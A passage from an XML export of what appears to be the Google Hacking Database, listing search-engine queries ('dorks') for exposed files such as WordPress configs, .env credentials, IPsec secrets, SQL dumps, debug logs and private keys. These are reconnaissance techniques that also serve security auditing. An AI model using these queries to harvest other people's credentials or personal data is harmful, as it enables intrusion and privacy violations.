</textualDescription>
<query>inurl:travis.yml tornado site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:travis.yml tornado site:github.com</querystring>
<edb></edb>
<date>2018-08-06</date>
<author>Mufeed VH</author>
</entry>
<entry>
<id>8366</id>
<link>https://www.exploit-db.com/ghdb/8366</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:typo3/index.php</shortDescription>
<textualDescription># Google Dork: inurl:typo3/index.php
# Files Containing Juicy Info
# Date: 30/11/2023
# Exploit: Appsec Jay</textualDescription>
<query>inurl:typo3/index.php</query>
<querystring>https://www.google.com/search?q=inurl:typo3/index.php</querystring>
<edb></edb>
<date>2023-11-30</date>
<author>Appsec Jay</author>
</entry>
<entry>
<id>8189</id>
<link>https://www.exploit-db.com/ghdb/8189</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:uploadimage.php</shortDescription>
<textualDescription># Google Dork: inurl:uploadimage.php
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: muhammetadibas</textualDescription>
<query>Vulnerable Files</query>
<querystring>https://www.google.com/search?q=Vulnerable Files</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>muhammetadibas</author>
</entry>
<entry>
<id>8185</id>
<link>https://www.exploit-db.com/ghdb/8185</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:user intitle:&quot;Drupal&quot; intext:&quot;Log in&quot; -&quot;powered by&quot;</shortDescription>
<textualDescription># Google Dork: inurl:user intitle:&quot;Drupal&quot; intext:&quot;Log in&quot; -&quot;powered by&quot;
# Files Containing Juicy Info
# Date:16/05/2023
# Exploit Author: Puneet Saraswat</textualDescription>
<query>inurl:user intitle:&quot;Drupal&quot; intext:&quot;Log in&quot; -&quot;powered by&quot;</query>
<querystring>https://www.google.com/search?q=inurl:user intitle:&quot;Drupal&quot; intext:&quot;Log in&quot; -&quot;powered by&quot;</querystring>
<edb></edb>
<date>2023-05-16</date>
<author>Puneet Saraswat</author>
</entry>
<entry>
<id>153</id>
<link>https://www.exploit-db.com/ghdb/153</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:vbstats.php &quot;page generated&quot;</shortDescription>
<textualDescription>This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors.</textualDescription>
<query>inurl:vbstats.php &quot;page generated&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Avbstats%2Ephp+%22page+generated%22</querystring>
<edb></edb>
<date>2004-04-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4284</id>
<link>https://www.exploit-db.com/ghdb/4284</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:vidyo -site:vidyo.com inurl:portal</shortDescription>
<textualDescription>Vidyo Portals. File Disclosure
inurl:vidyo -site:vidyo.com inurl:portal</textualDescription>
<query>inurl:vidyo -site:vidyo.com inurl:portal</query>
<querystring>https://www.google.com/search?q=inurl:vidyo -site:vidyo.com inurl:portal</querystring>
<edb></edb>
<date>2016-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4039</id>
<link>https://www.exploit-db.com/ghdb/4039</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-admin/admin-ajax.php inurl:wp-config.php</shortDescription>
<textualDescription>The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the
'wp-config.php' file. It contains information about the database,
including the name, host (typically localhost), username, and password.
This information allows WordPress to communicate with the database to store
and retrieve data (e.g. Posts, Users, Settings, etc).
Name: Suyog Pawar.
</textualDescription>
<query>inurl:wp-admin/admin-ajax.php inurl:wp-config.php</query>
<querystring>https://www.google.com/search?q=inurl:wp-admin/admin-ajax.php inurl:wp-config.php</querystring>
<edb></edb>
<date>2015-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>8236</id>
<link>https://www.exploit-db.com/ghdb/8236</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-config.txt intext:mysql</shortDescription>
<textualDescription># Google Dork: inurl:wp-config.txt intext:mysql
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit s Thakur</textualDescription>
<query>inurl:wp-config.txt intext:mysql</query>
<querystring>https://www.google.com/search?q=inurl:wp-config.txt intext:mysql</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4325</id>
<link>https://www.exploit-db.com/ghdb/4325</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/debug.log</shortDescription>
<textualDescription>According to the Wordpress docs at
https://codex.wordpress.org/Debugging_in_WordPress the option exists
to enable a debug log for a number of actions in Wordpress. In true
Wordpress style, this file is dropped into a web-readable directly,
with no consideration for who may be able to read the file.
Being a debug log, as you would expect this file can include full SQL
queries, full file paths, usernames, passwords and all other other
detail you'd expect in a debug log!
Of course, Google has picked up a number of these files, and I'm sure
there are many more just a quick scan away probably only protected by
robots.txt files.
GHDB Entry: https://google.com/search?q=inurl:wp-content/debug.log
James</textualDescription>
<query>inurl:wp-content/debug.log</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/debug.log</querystring>
<edb></edb>
<date>2016-09-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7454</id>
<link>https://www.exploit-db.com/ghdb/7454</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/plugins/easy-wp-smtp</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/plugins/easy-wp-smtp
# Files Containing Juicy Info
# Date:16/10/2021
# Exploit Author: Pratik Dabhi</textualDescription>
<query>inurl:wp-content/plugins/easy-wp-smtp</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/easy-wp-smtp</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Pratik Dabhi</author>
</entry>
<entry>
<id>7079</id>
<link>https://www.exploit-db.com/ghdb/7079</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/plugins/modern-events-calendar-lite</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/plugins/modern-events-calendar-lite
# Date: 03/08/2021
# Exploit Author: Pratik Gaikwad</textualDescription>
<query>inurl:wp-content/plugins/modern-events-calendar-lite</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/modern-events-calendar-lite</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Pratik Gaikwad</author>
</entry>
<entry>
<id>7895</id>
<link>https://www.exploit-db.com/ghdb/7895</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/plugins/reflex-gallery/</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/plugins/reflex-gallery/
# Files Containing Juicy Info
# Date: 21/12/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:wp-content/plugins/reflex-gallery/</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/reflex-gallery/</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3865</id>
<link>https://www.exploit-db.com/ghdb/3865</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/uploads/dump.sql</shortDescription>
<textualDescription>This is *Mohan Pendyala* (penetration tester) from india.
Google Dork: *inurl:wp-content/uploads/dump.sql*
*
*
The *Dump.sql* file reveals total info about the database tables, Users,
passwords..etc</textualDescription>
<query>inurl:wp-content/uploads/dump.sql</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads/dump.sql</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>8203</id>
<link>https://www.exploit-db.com/ghdb/8203</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/uploads/sites</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/uploads/sites
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Stuart Steenberg</textualDescription>
<query>inurl:wp-content/uploads/sites</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads/sites</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>8187</id>
<link>https://www.exploit-db.com/ghdb/8187</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/uploads/wcpa_uploads</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/uploads/wcpa_uploads
# Files Containing Juicy Info
# Date: 17/05/2023
# Author: Stuart Steenberg
</textualDescription>
<query>inurl:wp-content/uploads/wcpa_uploads</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads/wcpa_uploads</querystring>
<edb></edb>
<date>2023-05-18</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>7669</id>
<link>https://www.exploit-db.com/ghdb/7669</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/uploads/wooccm_uploads</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/uploads/wooccm_uploads
# Files Containing Juicy Info
# Date:7/11/2021
# Exploit Author: Stuart Steenberg</textualDescription>
<query>inurl:wp-content/uploads/wooccm_uploads</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads/wooccm_uploads</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>8231</id>
<link>https://www.exploit-db.com/ghdb/8231</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-includes</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-includes&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Author: Jose Rivas Aka. Bl4cksku11
</textualDescription>
<query>inurl:wp-includes</query>
<querystring>https://www.google.com/search?q=inurl:wp-includes</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Jose Rivas Aka. Bl4cksku11</author>
</entry>
<entry>
<id>4615</id>
<link>https://www.exploit-db.com/ghdb/4615</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-links-opml.php</shortDescription>
<textualDescription>A Google dork that gives the information about wordpress opml version
*Dork discovered by:*
m0be1
</textualDescription>
<query>inurl:wp-links-opml.php</query>
<querystring>https://www.google.com/search?q=inurl:wp-links-opml.php</querystring>
<edb></edb>
<date>2017-11-15</date>
<author>m0be1</author>
</entry>
<entry>
<id>1205</id>
<link>https://www.exploit-db.com/ghdb/1205</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-mail.php + &quot;There doesn't seem to be any new mail.&quot;</shortDescription>
<textualDescription>This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s).</textualDescription>
<query>inurl:wp-mail.php + &quot;There doesn't seem to be any new mail.&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Awp-mail.php++%2B+%22There+doesn%27t+seem+to+be+any+new+mail.%22</querystring>
<edb></edb>
<date>2005-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7547</id>
<link>https://www.exploit-db.com/ghdb/7547</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:WS_FTP.log</shortDescription>
<textualDescription># Google Dork: inurl:WS_FTP.log
# Files Contaning Juicy Info
# Date:31/10/2021
# Exploit Author: Suvam CyberSec</textualDescription>
<query>inurl:WS_FTP.log</query>
<querystring>https://www.google.com/search?q=inurl:WS_FTP.log</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Suvam CyberSec</author>
</entry>
<entry>
<id>4070</id>
<link>https://www.exploit-db.com/ghdb/4070</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:xampp inurl:perlinfo.pl ext:pl</shortDescription>
<textualDescription>Panels with a lot of data for webservers.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:xampp inurl:perlinfo.pl ext:pl</query>
<querystring>https://www.google.com/search?q=inurl:xampp inurl:perlinfo.pl ext:pl</querystring>
<edb></edb>
<date>2015-09-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1006</id>
<link>https://www.exploit-db.com/ghdb/1006</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:XcCDONTS.asp</shortDescription>
<textualDescription>This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious!</textualDescription>
<query>inurl:XcCDONTS.asp</query>
<querystring>https://www.google.com/search?q=inurl%3AXcCDONTS.asp</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5173</id>
<link>https://www.exploit-db.com/ghdb/5173</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl</shortDescription>
<textualDescription># Google Dork: inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl
# Description: Web Services Description Language file exposed to internet
# Date: 2019-04-09
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/</textualDescription>
<query>inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl</query>
<querystring>https://www.google.com/search?q=inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl</querystring>
<edb></edb>
<date>2019-04-10</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>3882</id>
<link>https://www.exploit-db.com/ghdb/3882</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:~~joomla3.txt filetype:txt</shortDescription>
<textualDescription>By this dork you can find juicy information joomla configuration files
Author: Un0wn_X</textualDescription>
<query>inurl:~~joomla3.txt filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl:~~joomla3.txt filetype:txt</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>76</id>
<link>https://www.exploit-db.com/ghdb/76</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ipsec.conf</shortDescription>
<textualDescription>The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting....</textualDescription>
<query>inurl:ipsec.conf -intitle:manpage</query>
<querystring>https://www.google.com/search?q=inurl%3Aipsec.conf+-intitle%3Amanpage</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>74</id>
<link>https://www.exploit-db.com/ghdb/74</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ipsec.secrets</shortDescription>
<textualDescription>from the manpage for ipsec_secrets: &quot;It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.&quot; So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!</textualDescription>
<query>inurl:ipsec.secrets -history -bugs</query>
<querystring>https://www.google.com/search?q=inurl%3Aipsec.secrets+-history+-bugs</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>75</id>
<link>https://www.exploit-db.com/ghdb/75</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ipsec.secrets</shortDescription>
<textualDescription>from the manpage for ipsec_secrets: &quot;It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.&quot; So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!</textualDescription>
<query>inurl:ipsec.secrets &quot;holds shared secrets&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Aipsec.secrets+%22holds+shared+secrets%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5205</id>
<link>https://www.exploit-db.com/ghdb/5205</link>
<category>Files Containing Juicy Info</category>
<shortDescription>jmeter.log filetype:log</shortDescription>
<textualDescription>jmeter.log filetype:log
Trace jmeter log files
ManhNho
</textualDescription>
<query>jmeter.log filetype:log</query>
<querystring>https://www.google.com/search?q=jmeter.log filetype:log</querystring>
<edb></edb>
<date>2019-05-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4651</id>
<link>https://www.exploit-db.com/ghdb/4651</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Kodi/Chorus - Web UI (View addons/Currently Playing/Remote Control/Stream/Change Settings) v1</shortDescription>
<textualDescription>Shout out to TorrentFreak (https://torrentfreak.com/is-your-kodi-setup-being-spied-on-180101/)
intitle:Kodi inurl:&quot;:8080&quot; &quot;Music. Music;&quot;</textualDescription>
<query>intitle:Kodi inurl:&quot;:8080&quot; &quot;Music. Music;&quot;</query>
<querystring>https://www.google.com/?q=intitle:Kodi inurl:&quot;:8080&quot; &quot;Music. Music;&quot;</querystring>
<edb></edb>
<date>2018-01-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4650</id>
<link>https://www.exploit-db.com/ghdb/4650</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Kodi/Chorus - Web UI (View addons/Currently Playing/Remote Control/Stream/Change Settings) v2</shortDescription>
<textualDescription>Shout out to TorrentFreak (https://torrentfreak.com/is-your-kodi-setup-being-spied-on-180101/)
intitle:&quot;Chorus 2 - Kodi web interface&quot;</textualDescription>
<query>intitle:&quot;Chorus 2 - Kodi web interface&quot;</query>
<querystring>https://www.google.com/?q=intitle:&quot;Chorus 2 - Kodi web interface&quot;</querystring>
<edb></edb>
<date>2018-01-04</date>
<author>Pancaker</author>
</entry>
<entry>
<id>5723</id>
<link>https://www.exploit-db.com/ghdb/5723</link>
<category>Files Containing Juicy Info</category>
<shortDescription>krb.conf OR krb.realms intitle:&quot;index of&quot; -public -archive -packages -pub</shortDescription>
<textualDescription>Kerberos information like usernames and kerbero realms.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>krb.conf OR krb.realms intitle:&quot;index of&quot; -public -archive -packages -pub</query>
<querystring>https://www.google.com/search?q=krb.conf OR krb.realms intitle:&quot;index of&quot; -public -archive -packages -pub</querystring>
<edb></edb>
<date>2020-02-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3765</id>
<link>https://www.exploit-db.com/ghdb/3765</link>
<category>Files Containing Juicy Info</category>
<shortDescription>List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls</shortDescription>
<textualDescription>This is a dork for a list of Phone Private Numbers in Argentina. Author: Luciano UNLP</textualDescription>
<query>List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls</query>
<querystring>https://www.google.com/search?q=allinurl:telefonos filetype:xls</querystring>
<edb></edb>
<date>2011-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>481</id>
<link>https://www.exploit-db.com/ghdb/481</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Lotus Domino address books</shortDescription>
<textualDescription>This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected.</textualDescription>
<query>inurl:&quot;/names.nsf?OpenDatabase&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3A%22%2Fnames.nsf%3FOpenDatabase%22+-inurl%3Agov</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>423</id>
<link>https://www.exploit-db.com/ghdb/423</link>
<category>Files Containing Juicy Info</category>
<shortDescription>mail filetype:csv -site:gov intext:name</shortDescription>
<textualDescription>CSV Exported mail (user) names and such.</textualDescription>
<query>mail filetype:csv -site:gov intext:name</query>
<querystring>https://www.google.com/search?q=mail+filetype%3Acsv+-site%3Agov+intext%3Aname</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5266</id>
<link>https://www.exploit-db.com/ghdb/5266</link>
<category>Files Containing Juicy Info</category>
<shortDescription>MAIL_HOST filetype:env</shortDescription>
<textualDescription># Exploit Title: Expose MAIL_HOST with credentials via Laravel Environment
# Google Dork: MAIL_HOST filetype:env
# Author: Francis Al Victoriano
</textualDescription>
<query>MAIL_HOST filetype:env</query>
<querystring>https://www.google.com/search?q=MAIL_HOST filetype:env</querystring>
<edb></edb>
<date>2019-06-24</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>302</id>
<link>https://www.exploit-db.com/ghdb/302</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Microsoft Money Data Files</shortDescription>
<textualDescription>Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called &quot;Passware&quot;.</textualDescription>
<query>filetype:mny mny</query>
<querystring>https://www.google.com/search?q=%3Cfiletype:mny+mny%3E&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-07-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3764</id>
<link>https://www.exploit-db.com/ghdb/3764</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Microsoft-IIS/7.0 intitle:index.of name size</shortDescription>
<textualDescription>IIS 7 directory listing. Author: huang
</textualDescription>
<query>Microsoft-IIS/7.0 intitle:index.of name size</query>
<querystring>https://www.google.com/search?q=Microsoft-IIS/7.0 intitle:index.of name size</querystring>
<edb></edb>
<date>2011-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>12</id>
<link>https://www.exploit-db.com/ghdb/12</link>
<category>Files Containing Juicy Info</category>
<shortDescription>mt-db-pass.cgi files</shortDescription>
<textualDescription>These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs...</textualDescription>
<query>intitle:index.of mt-db-pass.cgi</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+mt%2Ddb%2Dpass%2Ecgi</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>304</id>
<link>https://www.exploit-db.com/ghdb/304</link>
<category>Files Containing Juicy Info</category>
<shortDescription>MySQL tabledata dumps</shortDescription>
<textualDescription>sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry.</textualDescription>
<query>&quot;# Dumping data for table (username|user|users|password)&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22%23+Dumping+data+for+table+%28username%7Cuser%7Cusers%7Cpassword%29%22+-site%3Amysql.com+-cvs</querystring>
<edb></edb>
<date>2004-07-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>54</id>
<link>https://www.exploit-db.com/ghdb/54</link>
<category>Files Containing Juicy Info</category>
<shortDescription>mystuff.xml - Trillian data files</shortDescription>
<textualDescription>This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!</textualDescription>
<query>intitle:index.of mystuff.xml</query>
<querystring>https://www.google.com/search?q=mystuff.xml+intitle:%22index+of%22</querystring>
<edb></edb>
<date>2003-08-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5664</id>
<link>https://www.exploit-db.com/ghdb/5664</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Navicat MySQL Data Transfer filetype:sql</shortDescription>
<textualDescription># Google Dork : Navicat MySQL Data Transfer filetype:sql
# Category : Files Containing Juicy Info
# Date : 10-12-2019
# Author : Eka Syahwan
</textualDescription>
<query>Navicat MySQL Data Transfer filetype:sql</query>
<querystring>https://www.google.com/search?q=Navicat MySQL Data Transfer filetype:sql</querystring>
<edb></edb>
<date>2019-12-10</date>
<author>Eka Syahwan</author>
</entry>
<entry>
<id>7431</id>
<link>https://www.exploit-db.com/ghdb/7431</link>
<category>Files Containing Juicy Info</category>
<shortDescription>New Dork</shortDescription>
<textualDescription># Google Dork: inurl:robots.txt filetype:txt intext:cgi-bin
# Files Containing Juicy Info
# Date:13/10/2021
# Exploit Author: Golam Rabbany</textualDescription>
<query>New Dork</query>
<querystring>https://www.google.com/search?q=New Dork</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Golam Rabbany</author>
</entry>
<entry>
<id>8082</id>
<link>https://www.exploit-db.com/ghdb/8082</link>
<category>Files Containing Juicy Info</category>
<shortDescription>New Google Dork Discovery: Indexof:admin site:*.com</shortDescription>
<textualDescription># Google Dork: Indexof:admin site:*.com
# Files Containing Juicy Info
# Date:24/02/2023
# Exploit Author: Alok Bhagat</textualDescription>
<query>New Google Dork Discovery: Indexof:admin site:*.com</query>
<querystring>https://www.google.com/search?q=New Google Dork Discovery: Indexof:admin site:*.com</querystring>
<edb></edb>
<date>2023-02-24</date>
<author>Alok Bhagat</author>
</entry>
<entry>
<id>300</id>
<link>https://www.exploit-db.com/ghdb/300</link>
<category>Files Containing Juicy Info</category>
<shortDescription>OWA Public Folders (direct view)</shortDescription>
<textualDescription>This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks.</textualDescription>
<query>inurl:/public/?Cmd=contents</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%2Fpublic%2F%3FCmd%3Dcontents</querystring>
<edb></edb>
<date>2004-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>808</id>
<link>https://www.exploit-db.com/ghdb/808</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Peoples MSN contact lists</shortDescription>
<textualDescription>This will give msn contact lists .. modify the &quot;msn&quot; to what ever you feel is messenger related</textualDescription>
<query>filetype:ctt &quot;msn&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Actt+%22msn%22</querystring>
<edb></edb>
<date>2005-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>751</id>
<link>https://www.exploit-db.com/ghdb/751</link>
<category>Files Containing Juicy Info</category>
<shortDescription>php-addressbook &quot;This is the addressbook for *&quot; -warning</shortDescription>
<textualDescription>php-addressbook shows user address information without a password.</textualDescription>
<query>php-addressbook &quot;This is the addressbook for *&quot; -warning</query>
<querystring>https://www.google.com/search?q=php-addressbook++%22This+is+the+addressbook+for+*%22+-warning</querystring>
<edb></edb>
<date>2004-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>28</id>
<link>https://www.exploit-db.com/ghdb/28</link>
<category>Files Containing Juicy Info</category>
<shortDescription>phpinfo()</shortDescription>
<textualDescription>this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks &quot;joe!&quot; =)</textualDescription>
<query>intitle:phpinfo &quot;PHP Version&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3Aphpinfo+%22PHP+Version%22</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7302</id>
<link>https://www.exploit-db.com/ghdb/7302</link>
<category>Files Containing Juicy Info</category>
<shortDescription>phpMyAdmin -www filetype:conf site:*</shortDescription>
<textualDescription># Google Dork: phpMyAdmin -www filetype:conf site:*
# Files Containing Juicy Info
# Date:05/09/2021
# Exploit Author: Varsha Koli</textualDescription>
<query>phpMyAdmin -www filetype:conf site:*</query>
<querystring>https://www.google.com/search?q=phpMyAdmin -www filetype:conf site:*</querystring>
<edb></edb>
<date>2021-09-27</date>
<author>Varsha Koli</author>
</entry>
<entry>
<id>69</id>
<link>https://www.exploit-db.com/ghdb/69</link>
<category>Files Containing Juicy Info</category>
<shortDescription>phpMyAdmin dumps</shortDescription>
<textualDescription>From phpmyadmin.net : &quot;phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.&quot; Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information...</textualDescription>
<query>&quot;# phpMyAdmin MySQL-Dump&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=%22%23+phpMyAdmin+MySQL%2DDump%22+filetype%3Atxt</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>70</id>
<link>https://www.exploit-db.com/ghdb/70</link>
<category>Files Containing Juicy Info</category>
<shortDescription>phpMyAdmin dumps</shortDescription>
<textualDescription>From phpmyadmin.net : &quot;phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.&quot; Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information...</textualDescription>
<query>&quot;# phpMyAdmin MySQL-Dump&quot; &quot;INSERT INTO&quot; -&quot;the&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22%23+phpMyAdmin+MySQL-Dump%22+%22INSERT+INTO%22+-%22the%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4029</id>
<link>https://www.exploit-db.com/ghdb/4029</link>
<category>Files Containing Juicy Info</category>
<shortDescription>phpMyAdmin SQL Dump</shortDescription>
<textualDescription># Exploit Title: [phpMyAdmin SQL Dump]
# Google Dork: [intext:SET SQL_MODE=&quot;NO_AUTO_VALUE_ON_ZERO&quot;; = ext:txt]
# Date: [6/29/2015]
# Exploit Author: [Daz Holmes]</textualDescription>
<query>phpMyAdmin SQL Dump</query>
<querystring>https://www.google.com/search?q=intext:SET SQL_MODE=&quot;NO_AUTO_VALUE_ON_ZERO&quot;; = ext:txt</querystring>
<edb></edb>
<date>2015-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>326</id>
<link>https://www.exploit-db.com/ghdb/326</link>
<category>Files Containing Juicy Info</category>
<shortDescription>private key files (.csr)</shortDescription>
<textualDescription>This search will find private key files... Private key files are supposed to be, well... private.</textualDescription>
